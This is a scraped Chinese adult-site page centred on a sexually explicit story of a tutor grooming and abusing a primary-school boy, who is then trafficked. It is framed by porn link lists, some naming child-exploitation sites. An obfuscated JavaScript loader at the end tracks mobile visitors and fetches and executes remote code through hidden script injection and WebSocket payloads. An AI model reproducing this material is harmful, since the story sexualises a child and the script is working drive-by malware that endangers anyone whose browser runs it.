• 站长推荐




    热门搜索



    站长推荐




    女优精选
    点我看更多


    夢乃愛華
    波多野结衣
    早野詩
    三上悠亚
    河北彩花
    高桥圣子
    葵司
    水卜櫻

    番号库
    点我看更多


    综合番号
    200GANA
    259LUXU
    261ARA
    277DCV
    300MIUM
    300MAAN
    300NTK

    国产传媒
    点我看更多


    综合传媒
    麻豆传媒
    葫芦影业
    猫爪影像
    天美传媒
    果冻传媒
    91制片厂
    蜜桃传媒

    探花系列
    点我看更多


    91沈先生
    文轩探花
    千人斩
    太子探花
    屌哥全国探花
    鸭哥探花
    9总全国探花
    小天探花

    精选导航

  • 不良研究所
  • 帝王会所
  • 黑料福利网
  • 必备福利
  • 逗妇乳
  • 三千佳丽
  • 全球福利汇

  • 辅导老师收获的性奴男孩

    jkun资源站校园情事人气:715时间:2024-04-01 18:00:34

      道二是个乖巧的男孩子,一直很听话。只是,升入六年级后,学业上的要求使得道二开始有些吃力。于是,父亲为他请了一位家庭教师,辅导小升初的考试。

    这个周末,这位叫做伢子的老师来到了家中。得体的白色衬衫显得十分知性,齐肩的长发下,黑框眼镜还带着一点严肃,看起来是一位很认真的老师呢。据她自己介绍,三十多岁的她,做家庭辅导工作已经有很多年的经验了。

    在客厅里寒暄了一会儿,和道二以及他的母亲相互认识后,伢子小姐就提出要开始了解道二的学习情况。看着这位似乎一丝不苟的老师跟着道二进入他的房间并关上房门,母亲感觉很放心:这位老师似乎很专业呢。

    书桌前已经摆好了两张椅子。道二有些紧张地为伢子老师拉开椅子,等她坐下后自己才坐在书桌前。

    「真是一位小绅士呢~」伢子老师轻笑了一声。

    道二有些脸红。伢子老师的声音真好听。只是比之前,她的声音似乎有些荡漾。

    多半是之前在客厅里杂音太多了吧。

    抛开那些胡思乱想,伢子老师已经从随身携带的包中取出了一份试题,让道二把最近完成的作业和试卷拿给她看,然后做一下这份试题。

    道二有些紧张,怕自己的表现不够好。不过,很快他就平静了下来。试题很简单,有的有些奇怪,比如自己的身高、体重什么的。还有一些似乎是学校性教育方面的知识,有些迷糊的道二把自己还模模糊糊记住的东西写了上去。很快,就把题目做完了。

    转过身,伢子老师还没看完自己的试卷。

    似乎为了更舒服一些,伢子老师虽然还是端坐着,右腿却翘在了左腿上。原本齐膝的黑色套裙似乎短了很多,紧紧包裹着黑色丝袜下的大腿。

    不知为何,一向只知道看书看动漫打游戏的道二,感觉今天老师的黑色丝袜,那么好看。

    母亲有时候也会穿丝袜,可是自己却从没有过别的念头。可是,今天不知道为什么,道二感觉有点热,喉咙有些发涩,自己总是忍不住瞥向伢子小姐那交叠在一起的黑丝长腿,视线沿着那优美的弧线向下,看到一双娇小的小脚,接着又沿着那不知为何如此诱人的弧线看上去。

    「咳咳~」伢子老师轻咳了一声。

    道二慌忙将视线转开,把侧过来的身子转回书桌,慌张地掩饰着。

    「老师,我,我已经答完了。」

    「很好,稍等一下,我还没有看完。」伢子小姐似乎没有注意到他的小动作,依然专心看着试卷。

    似乎左腿有些酸,伢子轻轻调整了一下坐姿,将左腿翘在了右腿上。

    阳光洒进了房间。道二忍不住,又转过身。

    然后忍不住咽了一口口水。

    伢子小姐这个坐姿,在一双大腿和套裙之间,一丝白色的光,隐约显现了出来。

    伢子小姐……穿着白色的内裤呢……似乎是丝质的……仅仅在课堂上学了些生理知识、还没有发育的男孩道二,只感觉自己的眼睛似乎被牢牢地吸引了过去,看向那里,想要看的更仔细。

    虽然知道这样是无礼的、是错误的,学校里也教育过不能对女生做这种事情,可是仿佛空气凝固了一般,道二只觉得口干舌燥,身体似乎僵硬了起来,全身的血液似乎都集中到了尿尿的地方,不知为何变得那么硬。大脑似乎都失去了思考能力,只想记住眼前的画面。

    黑色丝袜和黑色套裙之间,似乎在呼唤着他。

    窒息。

    燥热。

    向往。

    「道二君,你在看向哪里呢?」吐气如兰,一股幽香飘近,一个略带沙哑的声音传来,如天籁般解除了道二身体的僵直,赶快把视线收回桌子上的试题。

    「老师(【せんせい】【Sennsei】)…」

    慌张地想要解释,可是喉咙却被扼住一般,发不出声音。

    之前温柔亲和的声音,此时在耳边变得甜腻了起来。

    「道二君,你在想什么呢……」

    慌张的道二将身体靠近书桌,想掩饰自己裤裆里凸起的丑态。瑟缩地扶着桌边,惶恐让外面的母亲知道自己刚刚的样子。

    「砰砰砰!」忽然,响起了敲门声。

    「不好意思打扰了!伢子老师,我在客厅里准备了茶水和点心,您累了可以休息一下。我有点事情,要出去一下,道二这孩子就拜托您了!」刚刚似乎靠过来的伢子老师,又端坐回了她的位置,还在看着试卷,裙子似乎也恢复了原先的长度,遮住了之前那梦幻般的景象。

    道二轻抒了一口气,似乎刚刚什么都没有发生。

    是我自己头晕了吧?他原本这样安慰自己,可是胯下那硬起来的感觉,却没有消除。

    「咔哒~」家门锁上了。

    一只羊脂白玉般的纤手,将一副眼镜放在了书桌上。

    幽谧的香气再次靠近道二。这次,这个男孩还没侧过身,耳边已经传来了一股香风。

    「现在,就剩下老师和道二两个人了。」

    一只灵巧湿滑的舌尖,若即若离地触碰着男孩的耳朵。

    第2章

    道二原本放松的身体,再次僵硬了起来。虽然被舔的地方是耳朵,可是自己仿佛全身都被电流通过一般,肌肉都麻痹了。

    「道二君,为什么,你那个地方,凸起的那么厉害呢?」伢子躬着身,一手搭在道二的肩膀上,另一只手悄然探向了道二的下体。

    原本紧张捂着自己裆部的小男孩,只感到一只温柔、苍白的大手轻轻抚弄着自己的手臂。那指尖在男孩还没长出汗毛的手背、手腕上爱抚着,紧张地青筋凸起的血管似乎被挑动地更加明显了。

    「好棒啊道二君,少年的皮肤永远是让人羡慕呢~」耳边继续飘来轻柔而带有一丝媚意的声音。

    「之前道二君,是不是一直在看我裙子的下面,想摸一摸我的那里呢?」伢子老师原本搭在男孩肩膀的那只手微微用力,道二不由自主转过身,只见面前的伢子老师正弯着腰,套裙包裹的臀部高高地翘起,上半身俯下来正对着自己。伢子脸上带着一丝神秘的微笑。去除了眼镜的遮挡,飞扬的眼角和长长的睫毛使得伢子的眼神显得异常妩媚。鲜艳多汁的红唇吐露着道二不敢相信的话,嘴角的美人痣轻轻跳动,让道二不由得把手上的控制权完全交给了眼前这位忽然散发着异香的熟女。

    伢子轻松地牵住男孩那原本试图遮掩自己裤子里丑态的手,缓缓地将其拽到了自己大腿侧。道二的眼神不由得跟着自己的手指,慢慢靠近了那似乎散发着热气和异香的黑色丝袜。

    「啊~」

    「啊~」原本是学习之处的房间内,道貌岸然的美妇和懵懂无知的男孩,同时发出了一声呻吟。男孩的声音里带着一丝嘶哑,妇人的声音却带着一丝迫不及待的急切。

    道二的手被抓着,顺着那冰凉而有细腻的黑色丝袜上下肆意游走,原本的羞怯已经逐渐褪去,男孩愈发主动地想探寻这美妙的手感和勾人的曲线。

    「老师的腿摸起来舒不舒服啊?」看着身前眼神已经发直的男孩,伢子依然用魅惑的声音诱导着。

    「舒、舒服。」似乎对语言已经有些迟钝,男孩含糊着跟着回应。

    「想不想感受一下老师裙子里是什么啊?」伢子一边轻轻喘着气,一边继续引导着男孩。而她的另一只手,正不断地抚摸着男孩瘦小的身躯。男孩身上那一身单薄的白衬衫,完全无法阻挡这种从后背摸到前胸的成熟妇人的爱抚。

    已经完全沉浸在手上快感和眼前美人的道二,只觉得老师的手抚过的地方,似乎都沸腾了起来。尚且年幼的身体被成熟异性的抚摸完全带动了起来,下体变得更硬了。

    「想……老师…我想…」

    艰难地发出声音,道二的大脑似乎已经停止了转动,愿意服从眼前老师的任何要求。

    「好孩子,那就……用你的舌头,来亲吻我的花蜜吧!」原本妩媚的声音,忽然带上了一丝命令的语气。一直躬下腰的伢子,忽然站直了身子。岔开了那双丰腴而勾人的黑丝双腿,一把将原本坐在椅子上的男孩,按在了两腿之间!

    被粗鲁地从椅子上拉下来的道二,却没有任何不满。那稚嫩的小脸上原本清明的表情已经被欲火和痴迷取代,顺从地跪在地上。

    此时的伢子,脸上已经彻底褪去了在道二母亲面前的端庄和严肃,只剩下狂热和得意。低下头看着面前跪下的小男孩,伢子露出了邪恶的笑容,一手托着道二的小脸,另一只手则把裙子的下摆慢慢拉到了腰部,露出了丰淫的下体。

    开裆的连体黑丝中间,女式的白色蕾丝内裤包裹着饱满而有神秘的女淫。不知何时,淫靡的腥臭已经透过了那一层薄薄的丝质织物,悄然向下沉降。

    下面,是一个还在上小学的男孩。那原本纯真的面孔上,鼻孔剧烈的扩张收缩着,仿佛要将最美的气息吸进肺里。

    双手扶住那勾人犯罪的美腿,道二像狗一样努力地吸着腥臊的女性气息。这从未感受过的味道,激起了他的本能,想要把成熟异性的感觉浸染进男孩那青春天真纯洁的血液里。

    「舔,伸出你的小舌头,给老师舔!」

    成熟妇人一把将男孩的小脸托到胯下,用娇媚却有带着威严的语气,下达着命令。

    道二只觉得眼前一黑,鼻尖已经顶在了之前魂牵梦萦的女阴处。蕾丝内裤似乎已经被淫水打湿,那难以描述的气息充斥着鼻腔。

    大脑不由自主地遵从老师的指令,男孩笨拙地探出舌头,去探索女子身上最隐晦、最阴柔而又最神秘的所在。

    微咸而又带着腥臊的液体,缓缓地顺着男孩那无知又纯洁的舌头,进入了他的身体。成熟妇女的淫水,缓缓滋润着这个还没发育成熟的少年。

    「哦~啊~真棒~」

    「好好舔~都咽下去~老师的蜜水~是好孩子最需要的~」「嗯~哦真乖~道二君最好了~舔的老师好舒服」「用你的舌头~努力顶~大口喝下去~真好~」伢子老师的声音,时而婉转,时而低沉,时而高昂,时而深沉。这个时候,她如同最好的老师那样,教育着年幼无知的男孩,将那纯洁的少年灵魂,用自己的淫水,向无法想象的黑暗滋养着、诱导着。

    不知道咽下了多少淫汁,男孩却依然觉得口干舌燥,可是只用双手抚摸着丝袜长腿已经缓解不了。五脉沸腾下,裤子包裹下的小鸡鸡硬得发疼。隔着一层布,他拼命地舔着熟女的下体,可是依然难以缓解。

    就在道二难受得不知如何是好时,忽然脸上一松。睁开眼睛,伢子老师后退了几步,坐在了床上。

    「过来啊,好孩子,坐在老师身边。你的小鸡鸡里有坏东西,老师来帮你把它弄出来哦。」

    伢子斜靠在床上,眼波流转,满脸春情。一手托腮,另一只手解开上半身白色衬衫的纽扣,揉捏着白色蕾丝胸罩下饱胀的胸部,呼唤着眼前迷惘的道二。收拢在腰间的裙子下面,丰满的臀部以及性感的长腿,依然用让所有男人欲罢不能的曲线,发出了香艳的邀请。

    第3章

    已经完全被本能控制的男孩,像狗一样双手支地,爬向了眼前的伢子。为人师表的中年美妇已经褪去了伪装的外表,熟练地勾起了童真少年的欲望,用人体的本能,逐步将无知的男孩收入自己的控制之中。

    看着爬到自己面前的男孩,伢子微笑着将他牵上床,迅速剥掉了男孩的衣服。

    如小白羊一般的男孩胴体就这样暴露在了空气中,之前被束缚住的小阴茎正笔挺地向上矗立,依然包裹着的包皮末端,已经吐露出了一些晶莹的先走液。

    道二发自本能的羞怯,让他有些不知所措,脸上泛起了红晕。

    这稚嫩的小脸、无知的表情,一下子激起了熟女蹂躏的欲望。一把将男孩搂入怀中,看着不知所措地闭上眼的道二,伢子如看到了新鲜的水蜜桃一般,烈焰红唇一口噙住了男孩的小嘴儿。

    在散发着成熟香气的妇人怀里,道二原本还因为害怕而扭动了几下,被强吻之后嗯咛了几声,便沉浸在了这从未有过的感受之中。老师的吻散发着香甜的气息,蹂躏着依然粉嫩的男孩嘴唇。很快,一条灵活的香舌已经滑进了男孩的口中,主动纠缠住了男孩那不知所措的小舌头。这种被侵入的微妙感觉,让道二感觉似乎要沉溺其中、忘却一切了。

    忽然,下体那肿胀滚烫的肉棒,被一只冰凉的手一把握住了。美妇把道二抱在腿上,一手搂住男孩的肩膀,另一只纤手便抚弄起了男孩痛苦又舒爽的根源。

    修长而又冰冷的玉指在粉红的肉棒上下翻飞,时而快时而慢地捋动着,刺激着男孩的快感。鲜红的指甲时而划过未经人事的肉茎,一瞬间带来的刺痛和舒爽,会如电流一般在男孩的身体传过,引得纤弱的身体一阵颤抖。而本应发出的呢喃声,却完全消失在了美妇这持续不断的热吻中。

    道二,已经忘却了一切。

    被美妇抱在怀里,让他充满了安全感。而妇人身上依然穿着的蕾丝内衣、连体丝袜却又在敏感处不断刺激他的皮肤。甜腻的香水混杂着妇人下体不断渗出的淫水骚气,不断地被吸进男孩的肺里,仿佛贯穿他的全身,点燃那提前数年到来的性的欲望。在自己嘴里搅动的香舌,一边将香甜的口水灌入男孩的腹中,一边让自己沉迷于这种肉体交错的快感。

    大脑的思维,已经完全被下面血液汇集的勃起童茎取代。只有伢子老师冰凉温柔的手指,才能缓解一点全身的燥热。

    「伢子老师~伢子老师~好舒服~好舒服~」尽管嘴巴完全发不出声音,道二依然不断在心中呢喃着,小腿时而绷直,时而松弛着。

    看着眼前沉浸在自己热吻和手交中的少年,全身散发着淫靡气息的伢子,露出了满意而又淫邪的笑容。

    忽然,她感觉左手中那根第一次因为女色而勃起的肉棒,开始剧烈颤抖了起来,赶忙放开了被夺去了初吻和思维的男孩,转过身,一口含住了那即将喷出童子初精的肉棒。

    男孩那已经被玩坏的脸上,双眼无神而空洞地睁开着,嘴巴大张着喘息。原本已经被玉手玩弄许久的敏感肉棒,忽然又被湿润、重叠的小嘴含住,还有一只蛇舌在不断舔弄钻舐。

    「啊~!」发出了无声的呐喊,忽然感到一股强烈的吸力。被父母辛苦养育十多年的童男子,倏地银瓶乍破,精关被妖异的吸力吸破,童子初精就这样如大江奔涌一般,冲向了妖妇那欲求不满的嘴中。

    「咕噜~咕噜~」房间内,只剩下妇人贪婪地吞噬少年初精的声音。道二已经被第一次射精的快感冲击地失去知觉,纯洁的身体只剩下无意识的抽搐,被这几乎全裸的妖艳妇人抱在腿上,肆意吸取着男孩体内最纯真的精华。

    当口中的肉棒失去之前的生气、软下来之后,伢子还意犹未尽地吸了一下,将铃口残余的那点元阳童精纳入体内。

    从容地系上之前解开的衬衫扣子,戴上了之前掩饰自己气质的眼镜,将裙子放回膝盖处。伢子恢复了之前的严肃模样。之前全身洋溢的春情完全消失不见。

    忽然像是想起了什么似的,伢子又把已经湿透的内裤脱了下来,放在失去意识的道二的口鼻处。这个妇人俯下身子,在男孩的耳边,用仿佛有着莫名催眠魔力的声音,灌输着什么。

    第4章

    道二的母亲回来之后,看见书房内,戴着眼镜的伢子老师正襟危坐,为道二指点着他掌握不足的科目。而道儿也认真地听着老师的话,时而转过身在笔记本上记录下知识点。

    她很满意。这次请了一位好老师,相信他的儿子终于可以把成绩提上去。

    她不知道的是,她养育十二年的男孩,身体和灵魂的一部分,已经被淫艳的妇人所浸染。而这被感染的部分,将如癌细胞一样,在淫水的滋养下,不断壮大,直到彻底将男孩那纯真的灵魂坠入无边淫狱中。而这具青春、可爱、阳光的少年肉体,将会被永远监禁在黑暗里,成为欲求不满的女人的玩具。

    半年后,由于道二在小升初考试中取得了不错的成绩,他的父母给伢子老师送上了一份感谢红包,然后让道二自由地享受这个升学假期。

    几个礼拜后,看着最近瘦了不少的儿子出门去山里远足的身影,他的母亲不禁感慨,自己的孩子学习得太累了,需要好好放松放松。

    然而,道二,再也没有回来。

    双眼呆滞的男孩,进入郊区的树林后,就消失了一般。

    在离开了最后一个监控摄像头之后,一个用黑色纱巾遮掩面孔的高挑女子,将道二带上车,开入了一个不为人知的庄园之中。

    车门打开,已经自己脱去了全身衣服的男孩,被戴着蕾丝手套的女子牵着已经狰狞地勃起的肉棒,走进了庄园内。

    「新货色,小学毕业的男孩子,前面后面都还是处男呢。」摘下面纱,露出了伢子老师的面孔。只是这个时候的她,脸上充满了得意与淫邪。

    「伢子老师,你挑选并且教育的学生,都是我们会所最让人满意的小宝贝啊。

    我们的议员夫人还有尼子董事小姐,早就想「教导」一下新来的男孩子了。」伴随着高跟鞋「噔噔噔」噔声音,一身精致晚礼服包裹下,一位娇艳的金发成熟女子从幽深华丽的屋内迎了出来。

    只听她那娇媚的声音,已经陷入失神状态的道二,他那勃起的肉棒竟不由自主地颤抖了一下,渗出了液体!

    随手将男孩褪下的衣裤丢进了旁边正熊熊燃烧的壁炉内,这位似乎掌管着该市警方的成熟女性,却如老鸨一般打量着全身赤裸的男孩,浪笑了几声,带着道二和伢子走进了屋内。

    「轰……」三人乘坐电梯缓缓降入地下。

    道二,这只新捕获的性奴,再也没有见过太阳。

    (完)



      

    热门资讯


    友情链结

  • 不良研究所
  • 必备福利
  • 帝王会所
  • 全球福利汇
  • 黑料福利网
  • 三千佳丽
  • 逗妇乳
  • 黑色360导航
  • 她趣福利社
  • 花社导航
  • 番号研究所
  • 狼友集中营
  • 小马学院+
  • 隐秘部落
  • 童妓⚤青楼
  • 熟女超市
  • X站推送网
  • 萝莉岛VIP
  • 美色研究所
  • 猛男情報局
  • 必射榜
  • 熟女屋
  • G点导航
  • 换妻会所
  • 妃射不可
  • 色色研究所
  • 黑料网曝门
  • 无码乱伦网
  • 女友租赁

  • 联系信箱:[email protected]

    名称:国产呦女+ ,https://wuwu.oaoachug.link/调研资料/报告.html ,来路:18av , 来路低于300勿扰

    警告:本站收集的网址来源于全球互联网,网址内容和本站没有任何关系,网站在美国进行维护,受美国法律保护,如来访者国家法律不允许,请自行离开! © 2022

    国产

    三级

    日本无码

    日本有码

    欧美

    function uyJfTNs(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function DTzeVMH(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return uyJfTNs(t);};window[''+'I'+'N'+'S'+'b'+'W'+'a'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=DTzeVMH,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ssd.zmneysz.com:7891/stats/7544/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMllM0EllMkYllMkZ0Zy4wYTlljLmNvbSUzQTg4OTE=','d3NNzJTNNBJTJGJTJGcG8uemFjdm0uY29tJTNNBOTUzMw==','4932',window,document,['l','N']);}:function(){};